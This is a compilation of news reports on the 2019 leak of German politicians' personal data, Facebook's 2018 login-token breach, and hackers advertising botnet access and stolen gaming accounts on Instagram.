The data was leaked from a Twitter account, since suspended, and included email addresses, phone numbers, photo IDs and other personal data on hundreds of senior political figures. According to a government spokesperson, there was no "sensitive" data from the chancellor's office, but other lawmakers had more personal data stolen. Other portions of the leaked data included Facebook and Twitter passwords. Some had their credit card information stolen, and chat logs and private letters published in the breach.

Germany's Federal Office for Information Security said in a statement that it was "extensively investigating" the breach, but does not believe there was an attack on the government's networks. It's been reported that the hacker may have obtained passwords to access social media accounts. Often, hackers do this by tricking a phone company into "porting out" a person's phone number to another SIM card, allowing them to password reset accounts or obtain two-factor codes.

The hacker leaked data on senior lawmakers across the political spectrum, but noticeably absent were accounts for the country's far-right Alternative for Germany party.

The hack is reminiscent of a data breach involving the Democratic National Committee in 2016, which targeted the Democrats in the U.S. in the months running up to the U.S. presidential election. The U.S. government later attributed the hack to Russia, which prosecutors say tried to influence the election to elect Donald Trump to the White House. The Justice Department brought charges against seven suspects earlier this year for being part of the so-called "Fancy Bear" group of hackers, working on behalf of the Russian government.

Little is known about who is behind the leak of German lawmakers' data. The German government has not speculated about who — or if a nation state — may have been behind the attack. But the alleged hacker said in a statement linked from their Twitter account that they "operated alone and does not belong to any organization or similar on Twitter."

According to security experts who've seen portions of the data, the hacker spread the stolen information across several sites and mirrors, making it "really hard to take down."

    This data leak has so much data squirrelled away to avoid take downs. It must have required many man hours of uploading.
    – 70 mirrors of the download links
    – 40 d/l links, each with 3-5 mirrors
    – 161 mirrors of data files
    Plus the tweets, blog posts, mirrors of mirror links.
    — the grugq (@thegrugq) January 4, 2019

Germany's minister for justice Katarina Barley called the breach a "serious attack," one that aimed to "damage confidence in our democracy and institutions," according to the BBC.

It's not the first time that the German parliament has faced security issues. In 2015, attackers stole gigabytes of data on lawmakers, a breach Germany's domestic spy agency later accused Russia of being behind. Russia has repeatedly denied launching cyberattacks.

Source
23. Late last month, Facebook disclosed a massive security vulnerability that it claimed affected some 50 million login tokens, but details were somewhat thin on its impact pending further investigation. In a blog post today, the results are in some ways better and worse.

The company believes its initial estimate of 50 million compromised login tokens—it reset 90 million in total as a cautionary measure—was generous, and Facebook now believes the number of accounts impacted to be closer to 30 million. That's the good news, if you can call it that.

For 400,000 of the accounts, which these attackers used to seed the process of gathering login tokens, personal information, such as "posts on their timelines, their lists of friends, Groups they are members of, and the names of recent Messenger conversations" and, in one instance, actual message content, was compromised. Of the 30 million ensnared in the attack, Facebook believes that for around half, names and contact information—meaning phone numbers, email addresses, or both—were visible to the attackers; 14 million of that pool had that same information scraped as well as myriad other personal details, which Facebook believes could contain any of the following:

Facebook believes only 1 million of the total compromised accounts had no personal information accessed whatsoever.

Beginning with a set of accounts controlled by the attackers, the exploit jumped from friends of those users to friends of friends, ballooning to the eventual total of 30 million accounts via an automated script. Facebook reaffirmed that third-party apps were not accessed using the stolen tokens, and that the vulnerability did not affect other services the company owns, like WhatsApp or Instagram.

The vulnerability had existed in Facebook's code since July of 2017, and resulted in "an unusual spike of activity" September 14 of this year. It would be almost two weeks before the activity was determined to be a legitimate attack, and the exploit patched.

Facebook is working alongside the FBI, and according to remarks by Vice President of Product Management Guy Rosen this afternoon, the agency's investigation appears to be ongoing. When asked if any pattern exists among the victims or who might have been behind the attack, Facebook cited an FBI request not to disclose such information. Rosen did state the company does not believe the attack was directly related to the upcoming U.S. midterm elections.

According to Rosen, a tool in Facebook's help center will now show users if they were affected and what information may have been exposed. Users will also see a "customized message" in the coming days to assist in preventative measures.

Source
24. As hacking and gaming communities continue to intersect, some hackers are selling access to botnets and likely stolen Fortnite, Spotify, and other online accounts on Instagram.

Instagram isn't only for exotic travel, pet, or food photos. Communities of hackers are also using the social network to sell stolen Spotify and Fortnite accounts, as well as access to botnets designed to launch distributed-denial-of-service (DDoS) attacks. The accounts highlight social media companies' continuing issues with content moderation. In this case, Facebook, which owns Instagram, is having trouble preventing illegal content from being distributed on its platforms.

In particular, some people on Instagram are advertising botnets they claim to be associated with Mirai, a network of internet of things-based devices that have been repurposed to attack websites and servers by spamming them with traffic. Some are selling botnets based on other code.

"There is a lot of people in the community on Instagram," Root Senpai, who sells various hacking-related goods on Instagram, told Motherboard in a message on Discord, a messaging platform popular among gamers.

Caption: A screenshot of one of the Instagram posts advertising a botnet. Image: Instagram Screenshot

The hackers themselves and their wares appear to be unsophisticated. One Instagram post, which includes an apparent photo of the hacker's screen, claims to be selling access to a Mirai-based botnet, likely for attacking websites or other online services to try and slow them to a crawl. Several other users Motherboard found are selling access to other botnets, with one post advertising subscription-style plans for $5 to $80 a month (it is not immediately clear how powerful, or lackluster, these particular botnets may be). When asked how they obtained this botnet, perhaps by hacking into computers themselves, Root Senpai declined to elaborate for "security reasons," they said.

Another account, using the name ghostttzzz, includes a screenshot of their botnet control panel, with the text "hmu [hit me up] for spots." Some of the hackers are advertising these tools in normal Instagram posts, others are advertising them using the network's Stories feature.

Stolen accounts do generate interest from customers, "especially Fortnite accounts," Root Senpai added. As the game skyrocketed in popularity, hackers have continually cracked into Fortnite accounts to sell, some of which come with rare character skins. As Kotaku reported in March, some hackers break into accounts to use the victim's payment information to buy game upgrades, and then transfer them to other accounts.

Indeed, much of the activity from the Instagram hacker accounts overlaps with gaming communities. Some accounts, as well as posting photos of their botnet control screens, share images from Fortnite or other online games. Some of the hackers appear to be young; Root Senpai said that "there are a lot of kids on Instagram that is [sic] willing to buy botnet spots, mostly kids that play on console." "For me I just sell spots for fun and money because I am still to [sic] young to get a full job that can make a decent amount of money," they added.

Finding various accounts selling access to botnets and stolen accounts was fairly trivial. Many of them follow each other, making some form of hacker community on the platform. The scale of the issue is unclear, however: Motherboard focused on one particular collection of accounts that appear to interact with and follow each other. Root Senpai did describe people in the trade of these botnets and accounts as the "ig community."

Caption: A screenshot of one of the Instagram posts advertising Fortnite accounts. Image: Instagram Screenshot

Instagram's terms of service say users cannot "do anything unlawful, misleading, or fraudulent or for an illegal or unauthorized purpose." That, an Instagram spokesperson confirmed to Motherboard, includes selling access to hacked computers or accounts. The spokesperson added that Instagram is investigating the issue and will take steps to remove content violating its terms.

Motherboard did not share specific account names with Instagram. As we've argued before, it is not journalists' job to act as content moderators for some of the world's most powerful technology companies. Motherboard did share redacted screenshots with Instagram so it could see the sort of posts being shared by the hackers and provide a response.

Instagram has to deal with all sorts of offensive or illegal content on its platform. Internal Instagram documents previously obtained by Motherboard showed some of the company's enforcement strategies and policies for combating such content. "These are high intensity, prevalent abuse types that have led to PR fires on Instagram," one of the documents for training moderators obtained by Motherboard reads, referring to terrorism and drug sales on its platform.

At the time of writing, all of the accounts Motherboard found selling stolen accounts or access to botnets are still online.

Source